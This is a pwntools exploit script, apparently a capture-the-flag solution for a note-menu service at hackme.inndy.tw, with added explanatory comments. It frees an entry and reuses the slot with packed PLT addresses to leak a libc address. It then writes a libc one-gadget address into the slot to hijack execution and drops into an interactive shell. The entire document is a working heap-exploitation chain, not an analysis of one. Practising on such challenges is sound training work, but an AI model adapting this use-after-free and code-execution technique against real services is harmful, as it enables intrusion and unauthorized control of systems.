from pwn import *

# Log every byte exchanged with the service; the terminal list is the command
# pwntools runs when it needs to spawn a new window (e.g. for a debugger).
context.log_level = "debug"
context.terminal = ["deepin-terminal", "-x", "sh", "-c"]
# Connect to the challenge service and answer the first menu prompt with 'c'.
# `t` is the shared tube every helper below talks through.
t = remote('hackme.inndy.tw', 7713)
t.sendlineafter('::> ', 'c')
def add_n(size, data):
    """Drive menu option 'a' on the shared tube ``t``.

    Sends 'a', then *size* (stringified) at the ``size > `` prompt and *data*
    at the ``data > `` prompt.  Returns None.
    """
    t.sendline('a')
    t.sendlineafter('size > ', str(size))
    t.sendlineafter('data > ', data)
def open_n(id, data):
    """Drive menu option 'b' on the shared tube ``t``.

    Waits for the menu prompt, selects 'b', answers the ``id > `` prompt with
    *id* (stringified), declines the edit question with 'n', then sends *data*
    at the next menu prompt.  Returns None.
    """
    t.sendlineafter('::> ', 'b')
    t.sendlineafter('id > ', str(id))
    t.sendlineafter('edit (Y/n)', 'n')
    t.sendlineafter('::> ', data)
def del_n(id):
    """Drive menu option 'c' on the shared tube ``t``.

    Waits for the menu prompt, selects 'c', then answers the ``id > `` prompt
    with *id* (stringified).  Returns None.
    """
    t.recvuntil('::> ')
    t.sendline('c')
    t.recvuntil('id > ')
    t.sendline(str(id))
# PLT stub addresses used as entry payloads below (values as given in the
# script; presumably resolved from the target binary — not verifiable here).
plt_puts = 0x8048570
plt_free = 0x8048510

# Three entries: an 8-byte one holding the packed plt_free address, then two
# larger filler entries.
add_n(0x8, p32(plt_free))
add_n(0x40, 'aaaa')
add_n(0x30, 'bbbb')
# Open entry 1 without editing; chr(93) is ']' — what the service does with
# that byte is not visible in this script.
open_n(1, chr(93))
del_n(0)
# After deleting entry 0, add an 8-byte entry holding the packed plt_puts
# address and open entry 1 again; the recv() below expects the service to
# answer with 4 raw bytes.
add_n(0x8, p32(plt_puts))
open_n(1, chr(93))

# Local copy of the service's libc; the path is specific to the author's machine.
libc = ELF('/Users/carlstar/Downloads/libc-2.23.so.i386')
# Derive the libc base from the 4 bytes received: u32 unpacks them per the
# context endianness; the two subtracted constants are fixed adjustments whose
# origin is not derivable from this script.  NOTE(review): recv(4) may return
# fewer than 4 bytes — u32 would then raise.
libc.address = u32(t.recv(4)) - 48 - 0x1B2780
# Fixed offset into libc; what lives at that offset is not stated here.
magic = libc.address + 0x3ac3e
del_n(0)
add_n(0x8, p32(magic))
open_n(1, chr(93))
# Hand the connection over to the user.
t.interactive()